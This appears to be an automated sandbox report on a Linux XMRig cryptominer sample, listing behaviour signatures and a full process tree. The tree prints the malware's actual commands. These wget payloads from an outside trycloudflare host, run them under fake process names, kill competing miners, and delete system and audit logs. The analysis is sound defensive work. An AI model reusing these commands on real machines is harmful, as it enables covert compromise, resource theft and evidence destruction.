xmrig | b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1

Analysis

max time kernel
151s
max time network
42s
platform
debian-9_mips
resource
debian9-mipsbe-20231215-en
resource tags

arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22-01-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

xs.jpg
Size

5KB
MD5

30f950242f01e4e8503da91dbb2d5fdc
SHA1

cb9909bebcbc056e05e74b9c3c3b33a6a7a47659
SHA256

b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1
SHA512

229364a466b0a7cdb47a3061a36336c6426ebe06a747788967080a79ebf902b41a38f4870dbc5396afbdd8b75a42273f81ed131f133ffa3be68a3bf364e4a0d2
SSDEEP

96:uou4dH1Yl9iaV4GmNdCvasvagaevagvaGvaV1FtIxH7YmJE7N7MDMtBPXSEKydtu:ndVM9iazmNdCvXvDfvZvNvW1LIxH7Ym/

Score

10^/10

xmrig evasion miner persistence

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral3/files/fstream-2.dat	family_xmrig
behavioral3/files/fstream-2.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

persistence

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/etc/ld.so.preload

Deletes Audit logs 1 TTPs 1 IoCs

Deletes logs related to the Linux Audit framework.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/audit/audit.log	rm

Deletes system logs 1 TTPs 3 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/messages	rm
File deleted	/var/log/syslog	rm
File truncated	/var/log/messages	Process not Found

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/.sock	736	.sock
/usr/lib/procf/x	848	x
/usr/lib/procf/kexec	851	kexec
/usr/lib/procf/deamon-hoster	871	deamon-hoster

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	xs.jpg

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1571	xargs
713	chattr
1155	xargs
1462	xargs
1646	xargs
1378	xargs
1388	xargs
1403	xargs
1452	xargs
1532	xargs
1115	xargs
1214	xargs
1229	xargs
1457	xargs
1561	xargs
1576	xargs
1095	xargs
1135	xargs
1269	xargs
1527	xargs
1264	xargs
1323	xargs
1507	xargs
1606	xargs
1477	xargs
1685	xargs
942	xargs
1010	xargs
1259	xargs
1467	xargs
754	xargs
1636	xargs
1056	xargs
1353	xargs
1368	xargs
1061	xargs
1274	xargs
1512	xargs
1517	xargs
1110	xargs
1239	xargs
1393	xargs
1556	xargs
1219	xargs
1294	xargs
1304	xargs
1348	xargs
1591	xargs
891	xargs
1190	xargs
1249	xargs
1299	xargs
1655	xargs
1660	xargs
1160	xargs
1185	xargs
1254	xargs
1611	xargs
1289	xargs
1373	xargs
1447	xargs
1551	xargs
749	xargs
1076	xargs

Creates/modifies environment variables 1 TTPs 1 IoCs

Creating/modifying environment variables is a common persistence mechanism.

persistence

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/root/.bashrc	xs.jpg

Deletes log files 1 TTPs 32 IoCs

Deletes log files on the system.

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/installer/cdebconf	rm
File deleted	/var/log/wtmp	rm
File truncated	/var/log/wtmp	Process not Found
File deleted	/var/log/apt	rm
File deleted	/var/log/btmp	rm
File deleted	/var/log/daemon.log	rm
File deleted	/var/log/exim4	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/exim4/mainlog	rm
File deleted	/var/log/installer/cdebconf/templates.dat	rm
File deleted	/var/log/user.log	rm
File deleted	/var/log/apt/term.log	rm
File deleted	/var/log/faillog	rm
File deleted	/var/log/installer	rm
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/apt/history.log	rm
File deleted	/var/log/installer/syslog	rm
File deleted	/var/log/apt/eipp.log.xz	rm
File deleted	/var/log/audit	rm
File deleted	/var/log/installer/cdebconf/questions.dat	rm
File truncated	/var/log/laslog	Process not Found
File truncated	/var/log/secure	Process not Found
File deleted	/var/log/debug	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/lastlog	rm
File truncated	/var/log/btmp	Process not Found
File deleted	/var/log/auth.log	rm
File deleted	/var/log/installer/hardware-summary	rm
File deleted	/var/log/installer/partman	rm
File deleted	/var/log/installer/lsb-release	rm
File deleted	/var/log/installer/status	rm

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Modifies Bash startup script 1 TTPs 1 IoCs

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/root/.bashrc	xs.jpg

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/871/stat	ps
File opened for reading	/proc/374/stat	ps
File opened for reading	/proc/84/status	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/529/status	ps
File opened for reading	/proc/529/stat	ps
File opened for reading	/proc/5/status	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/374/status	ps
File opened for reading	/proc/765/status	ps
File opened for reading	/proc/675/status	ps
File opened for reading	/proc/121/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/393/status	ps
File opened for reading	/proc/1068/status	ps
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/241/stat	ps
File opened for reading	/proc/675/cmdline	ps
File opened for reading	/proc/529/stat	ps
File opened for reading	/proc/329/cmdline	ps
File opened for reading	/proc/330/stat	ps
File opened for reading	/proc/1070/status	ps
File opened for reading	/proc/73/cmdline	ps
File opened for reading	/proc/71/stat	ps
File opened for reading	/proc/384/stat	ps
File opened for reading	/proc/330/cmdline	ps
File opened for reading	/proc/330/cmdline	ps
File opened for reading	/proc/1565/stat	ps
File opened for reading	/proc/357/cmdline	ps
File opened for reading	/proc/1073/cmdline	ps
File opened for reading	/proc/241/stat	ps
File opened for reading	/proc/871/status	ps
File opened for reading	/proc/150/cmdline	ps
File opened for reading	/proc/241/stat	ps
File opened for reading	/proc/2/cmdline	ps
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/22/status	ps
File opened for reading	/proc/241/stat	ps
File opened for reading	/proc/122/cmdline	ps
File opened for reading	/proc/529/cmdline	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/72/stat	ps
File opened for reading	/proc/329/status	ps
File opened for reading	/proc/871/stat	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/111/status	ps
File opened for reading	/proc/69/status	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/707/stat	ps
File opened for reading	/proc/8/cmdline	ps
File opened for reading	/proc/154/status	ps
File opened for reading	/proc/357/cmdline	ps
File opened for reading	/proc/393/status	ps
File opened for reading	/proc/569/status	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/357/status	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.sock	wget

/tmp/xs.jpg
/tmp/xs.jpg
1⤵
- Writes DNS configuration
- Creates/modifies environment variables
- Modifies Bash startup script
PID:704
- /bin/chmod
  chmod +wr /tmp
  2⤵
  PID:710
- /usr/bin/chattr
  chattr -ia /tmp
  2⤵
  - Attempts to change immutable files
  PID:713
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  PID:715
- /bin/cat
  cat /dev/null
  2⤵
  PID:718
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/netsocketx -O /tmp/.sock
  2⤵
  - Writes file to tmp directory
  PID:728
- /bin/chmod
  chmod +x /tmp/.sock
  2⤵
  PID:734
- /bin/sleep
  sleep 1
  2⤵
  PID:735
- /usr/bin/id
  id -u
  2⤵
  PID:737
- /usr/bin/nohup
  nohup bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /usr/local/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /usr/local/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /usr/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /usr/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsbe-20231215-en-0 -accept-tos"
  2⤵
  PID:736
- /tmp/.sock
  "[network-managerr]" "[email protected]" "-password=random#123" "-device-name=debian9-mipsbe-20231215-en-0" -accept-tos
  2⤵
  - Executes dropped EXE
  PID:736
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  PID:745
- /bin/grep
  grep "\\[inet_frag_qw]"
  2⤵
  PID:746
- /bin/grep
  grep -v grep
  2⤵
  PID:747
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:749
- /bin/ps
  ps -ef
  2⤵
  PID:750
- /bin/grep
  grep "\\[ipv6_addrconfd]"
  2⤵
  PID:751
- /bin/grep
  grep -v grep
  2⤵
  PID:752
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:753
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:754
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  PID:755
- /bin/grep
  grep sysinit
  2⤵
  PID:756
- /bin/grep
  grep -v grep
  2⤵
  PID:757
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:758
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:759
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:760
- /bin/grep
  grep "\\[watchdodg]"
  2⤵
  PID:761
- /bin/grep
  grep -v grep
  2⤵
  PID:762
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:764
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:765
- /bin/grep
  grep "\\[bdus-daemon]"
  2⤵
  PID:766
- /bin/grep
  grep -v grep
  2⤵
  PID:767
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:768
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:769
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:770
- /bin/grep
  grep "\\[slub_flushqw]"
  2⤵
  PID:771
- /bin/grep
  grep -v grep
  2⤵
  PID:772
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:773
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:774
- /bin/ps
  ps aux
  2⤵
  PID:775
- /bin/grep
  grep deamon-hoster
  2⤵
  PID:776
- /bin/grep
  grep -v grep
  2⤵
  PID:777
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:778
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:779
- /usr/bin/id
  id -u
  2⤵
  PID:780
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  PID:781
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:782
- /usr/bin/id
  id -u
  2⤵
  PID:783
- /bin/mkdir
  mkdir -p /usr/lib/procf
  2⤵
  PID:784
- /usr/bin/id
  id -u
  2⤵
  PID:785
- /bin/chmod
  chmod +w /usr/lib/procf
  2⤵
  PID:786
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  PID:787
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:788
- /bin/mkdir
  mkdir /usr/lib/procf
  2⤵
  PID:789
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/x4 -O /usr/lib/procf/x
  2⤵
  PID:791
- /bin/chmod
  chmod +x /usr/lib/procf/x
  2⤵
  PID:810
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kexec2 -O /usr/lib/procf/kexec
  2⤵
  PID:813
- /bin/chmod
  chmod +x /usr/lib/procf/kexec
  2⤵
  PID:837
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kc -O /usr/lib/procf/deamon-hoster
  2⤵
  PID:840
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster
  2⤵
  PID:846
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster /usr/lib/procf/kexec /usr/lib/procf/x
  2⤵
  PID:847
- /usr/bin/nohup
  nohup bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /bin/sleep
  sleep 3
  2⤵
  PID:849
- /usr/local/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /usr/local/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /usr/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /usr/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:848
- /usr/lib/procf/x
  "[ipv6_addrconfd]"
  2⤵
  - Executes dropped EXE
  PID:848
- /bin/sleep
  sleep 3
  2⤵
  PID:852
- /usr/bin/nohup
  nohup bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /usr/local/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /usr/local/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /usr/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /usr/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:851
- /usr/lib/procf/kexec
  "[bdus-daemon]"
  2⤵
  - Executes dropped EXE
  PID:851
- /bin/sleep
  sleep 5
  2⤵
  PID:872
- /usr/bin/nohup
  nohup /usr/lib/procf/deamon-hoster
  2⤵
  PID:871
- /usr/lib/procf/deamon-hoster
  /usr/lib/procf/deamon-hoster
  2⤵
  - Executes dropped EXE
  PID:871
- - /bin/sleep
    sleep 3
    3⤵
    PID:874
- - /bin/ps
    ps aux
    3⤵
    PID:887
- - /bin/grep
    grep -v grep
    3⤵
    PID:888
- - /bin/grep
    grep miner
    3⤵
    PID:889
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:890
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:891
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:892
- - /bin/grep
    grep -v grep
    3⤵
    PID:893
- - /bin/grep
    grep gitlabw
    3⤵
    PID:894
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:895
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:896
- - /bin/ps
    ps aux
    3⤵
    PID:897
- - /bin/grep
    grep -v grep
    3⤵
    PID:898
- - /bin/grep
    grep xmp
    3⤵
    PID:899
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:900
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:901
- - /bin/ps
    ps aux
    3⤵
    PID:903
- - /bin/grep
    grep -v grep
    3⤵
    PID:904
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:905
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:906
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:907
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:917
- - /bin/grep
    grep -v grep
    3⤵
    PID:918
- - /bin/grep
    grep khnug
    3⤵
    PID:919
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:920
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:921
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:925
- - /bin/grep
    grep -v grep
    3⤵
    PID:926
- - /bin/grep
    grep Linux2
    3⤵
    PID:927
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:928
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:929
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:938
- - /bin/grep
    grep -v grep
    3⤵
    PID:939
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:940
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:941
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:942
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:947
- - /bin/grep
    grep -v grep
    3⤵
    PID:948
- - /bin/grep
    grep kkssl
    3⤵
    PID:949
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:951
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:950
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:962
- - /bin/grep
    grep -v grep
    3⤵
    PID:964
- - /bin/grep
    grep cnrig
    3⤵
    PID:967
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:968
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:970
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:988
- - /bin/grep
    grep -v grep
    3⤵
    PID:989
- - /bin/grep
    grep stratum
    3⤵
    PID:990
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:992
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:993
- - /bin/ps
    ps aux
    3⤵
    PID:997
- - /bin/grep
    grep -v grep
    3⤵
    PID:998
- - /bin/grep
    grep vscode
    3⤵
    PID:999
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1000
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1001
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1006
- - /bin/grep
    grep -v grep
    3⤵
    PID:1007
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1008
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1009
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1010
- - /bin/ps
    ps aux
    3⤵
    PID:1016
- - /bin/grep
    grep -v grep
    3⤵
    PID:1017
- - /bin/grep
    grep xmrig
    3⤵
    PID:1019
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1020
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1021
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1027
- - /bin/grep
    grep -v grep
    3⤵
    PID:1028
- - /bin/grep
    grep c3pool
    3⤵
    PID:1029
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1030
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1031
- - /bin/ps
    ps aux
    3⤵
    PID:1037
- - /bin/grep
    grep -v grep
    3⤵
    PID:1038
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1039
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1040
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1041
- - /bin/ps
    ps aux
    3⤵
    PID:1042
- - /bin/grep
    grep -v grep
    3⤵
    PID:1043
- - /bin/grep
    grep pool
    3⤵
    PID:1044
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1045
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1046
- - /bin/ps
    ps aux
    3⤵
    PID:1047
- - /bin/grep
    grep -v grep
    3⤵
    PID:1048
- - /bin/grep
    grep dbused
    3⤵
    PID:1049
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1050
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1051
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1052
- - /bin/grep
    grep -v grep
    3⤵
    PID:1053
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1054
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1055
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1056
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1057
- - /bin/grep
    grep -v grep
    3⤵
    PID:1058
- - /bin/grep
    grep kinsing
    3⤵
    PID:1059
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1060
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1061
- - /bin/ps
    ps aux
    3⤵
    PID:1062
- - /bin/grep
    grep -v grep
    3⤵
    PID:1063
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1064
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1065
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1066
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1067
- - /bin/grep
    grep -v grep
    3⤵
    PID:1068
- - /bin/grep
    grep xmr
    3⤵
    PID:1069
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1070
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1071
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1072
- - /bin/grep
    grep -v grep
    3⤵
    PID:1073
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1074
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1075
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1076
- - /bin/rm
    rm -rf /tmp/xs.jpg
    3⤵
    PID:1077
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1078
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1079
- - /bin/sleep
    sleep 3
    3⤵
    PID:1080
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1081
- - /bin/grep
    grep -v grep
    3⤵
    PID:1082
- - /bin/grep
    grep miner
    3⤵
    PID:1083
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1084
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1085
- - /bin/ps
    ps aux
    3⤵
    PID:1086
- - /bin/grep
    grep -v grep
    3⤵
    PID:1087
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1088
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1089
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1090
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1091
- - /bin/grep
    grep -v grep
    3⤵
    PID:1092
- - /bin/grep
    grep xmp
    3⤵
    PID:1093
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1094
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1095
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1096
- - /bin/grep
    grep -v grep
    3⤵
    PID:1097
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1098
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1099
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1100
- - /bin/ps
    ps aux
    3⤵
    PID:1101
- - /bin/grep
    grep -v grep
    3⤵
    PID:1102
- - /bin/grep
    grep khnug
    3⤵
    PID:1103
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1104
- - /usr/bin/xargs
